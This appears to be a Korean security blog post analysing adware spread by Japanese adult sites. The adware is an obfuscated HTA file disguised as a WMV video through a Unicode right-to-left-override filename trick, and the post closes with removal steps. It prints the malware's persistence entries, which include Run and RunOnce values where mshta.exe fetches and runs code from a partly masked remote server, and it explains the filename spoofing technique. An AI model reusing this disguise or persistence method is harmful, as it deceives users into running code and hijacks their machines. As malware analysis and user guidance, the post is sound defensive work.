일본(Japan) 성인 웹 사이트에서 주로 배포가 이루어지고 있는 HTA 파일 확장명을 가진 파일을 실행할 경우 지속적으로 성인 광고 팝업창이 생성되는 문제로 고생하는 사례를 예전부터 소개한 적이 있었습니다.

그런데 최근에 2014년에 분석한 예약 작업과 시작 프로그램 영역에 시작값을 등록하여 시스템 시작시마다 자동으로 실행되는 일본 성인 광고가 유니코드 확장명을 조작하여 유포가 이루어지고 있는 부분을 발견하였습니다.

주요 배포 사이트는 일본(Japan) 성인 웹 사이트에서 제공하는 동영상 재생 버튼을 클릭할 경우 다음과 같은 파일을 다운로드할 수 있습니다.

  • MovieID_2A0wusly2x2n2IkaGr4h5pOGTZ6Km75vvmw.EI_noisreV.hta <SHA-1 : ea0d33278f4e5e7219a3772e3c0142670bbe563b - Kaspersky : Trojan.VBS.Redirector.k (VT : 8/54)>

Internet Explorer 웹 브라우저에서 제공하는 다운로드 창에서는 기존과 마찬가지로 hta 확장명을 가진 파일로 표시하고 있습니다.

그런데 다운로드된 파일을 확인해보면 Windows 탐색기 기본값에서는 WMV 동영상 파일 확장명을 가지고 있으며, 폴더 옵션에서 "알려진 파일 형식의 파일 확장명 숨기기" 체크값을 해제한 후에도 동영상 파일로 표시되는 것을 확인할 수 있습니다.

 

단지 숨어있는 파일 확장명을 표시한 경우 파일명 중간에 ath. 값이 표시되는 것을 확인할 수 있으며, 이는 유니코드(Unicode) 문자를 통해 파일 확장명을 RLO(Right-to-Left Override) 방식(오른쪽에서 왼쪽으로 덮어쓰기)으로 작성한 것을 눈치챌 수 있습니다.

RLO 방식으로 작성된 파일명을 수정해보면 "MovieID_2A0wusly2x2n2IkaGr4h5pOGTZ6Km75vath.EI_noisreV.wmv → MovieID_2A0wusly2x2n2IkaGr4h5pOGTZ6Km75v_vmw.EI_noisreV.hta" 파일로 변경되는 것을 확인할 수 있습니다.

 

즉, 원래는 hta 포맷을 가진 파일을 wmv 동영상 파일로 착각하여 실행하도록 할 목적으로 RLO 기법을 통해 파일 확장명을 조작한 것입니다.

다운로드된 hta 파일은 난독화된 VBScript로 작성되어 있으며 디코딩을 해보면 Run, RunOnce 시작 프로그램, 예약 작업 영역에 자신을 등록하고 있으며, 일부값이 삭제된 경우 자동으로 재생성되도록 제작되어 있습니다.

사용자가 동영상 파일로 착각하여 파일을 실행한 경우 화면상에서는 일본(Japan) 성인 웹 사이트로 자동 연결되어 프로모션 기간 동안 동영상 재생을 위한 할인된 가격에 유료 결제를 하도록 유도하고 있습니다.

이후 자동으로 특정 웹 서버에서 맛보기용 스트리밍 성인 동영상을 다운로드하여 재생을 시도하며, 이 과정에서 사용자 몰래 다음과 값을 추가하여 시스템 시작시마다 자동 실행되도록 구성되어 있습니다.

 

[생성 파일 등록 정보]

 

C:\Windows\System32\Tasks\RegWrite
C:\Windows\System32\Tasks\SystemBoot

 

[생성 레지스트리 등록 정보]

 

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
 - RegWrite2A0wusly2x2n2IkaGr4h5pOGTZ6Km75v = mshta.exe h**p://jrd.********.info/set_inf2.php?cccid=2A0wusly2x2n2IkaGr4h5pOGTZ6Km75v
 - SystemBoot2A0wusly2x2n2IkaGr4h5pOGTZ6Km75v = mshta.exe h**p://jrd.********.info/reg2.php?cccid=2A0wusly2x2n2IkaGr4h5pOGTZ6Km75v&log=1

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
 - RegWrite2A0wusly2x2n2IkaGr4h5pOGTZ6Km75v = mshta.exe h**p://jrd.********.info/set_inf2.php?cccid=2A0wusly2x2n2IkaGr4h5pOGTZ6Km75v

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{02055F52-40EE-4289-A70A-089317885DFA}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3365C570-3092-497B-BE8C-C07ADE6071C0}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\RegWrite
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SystemBoot

이를 통해 시스템 시작 후 시스템 트레이 알림 아이콘 상단에 일본(Japan) 성인 광고 팝업창이 지속적으로 생성되어 PC 사용을 정상적으로 할 수 없을 정도로 방해를 합니다.

동작 방식을 살펴보면 시스템 시작 후 3분 또는 10분 단위로 성인 광고 팝업창을 생성하도록 "C:\Windows\System32\mshta.exe" 시스템 파일(Microsoft (R) HTML 응용 프로그램 호스트)을 로딩하여 특정 웹 서버에 등록된 정보를 불러와 팝업창을 생성합니다.

 

이 과정에서 사용자에 의해 일부 삭제된 자동 실행값이 존재할 경우 재생성하여 삭제를 방해할 수 있습니다.

 

일본(Japan) 성인 광고 팝업창 제거 방법

 

(a) "제어판 → 시스템 및 보안 → 관리 도구 → 예약 작업" 메뉴를 실행하여 작업 스케줄러 라이브러리에 등록된 RegWrite, SystemBoot 작업 스케줄러 값을 찾아 삭제하시기 바랍니다.

 

(b) 레지스트리 편집기(regedit)를 실행하여 다음의 레지스트리 값을 찾아 삭제하시기 바랍니다.

 

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
 - RegWrite********

 - SystemBoot********

 

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
 - RegWrite********

 

(c) Windows 작업 관리자를 실행하여 mshta.exe 프로세스가 실행 중이라면 종료하시기 바랍니다.

악성코드 유포시 파일 확장명을 조작하여 실행을 유도하는 사례가 있다는 점을 명심하시고, 인터넷 상에서 다운로드한 파일 실행시 표시되는 확장명을 그대로 믿고 실행하는 일이 없도록 주의하시기 바랍니다.

블로그 이미지

벌새

울지않는벌새가 되고 싶은 나..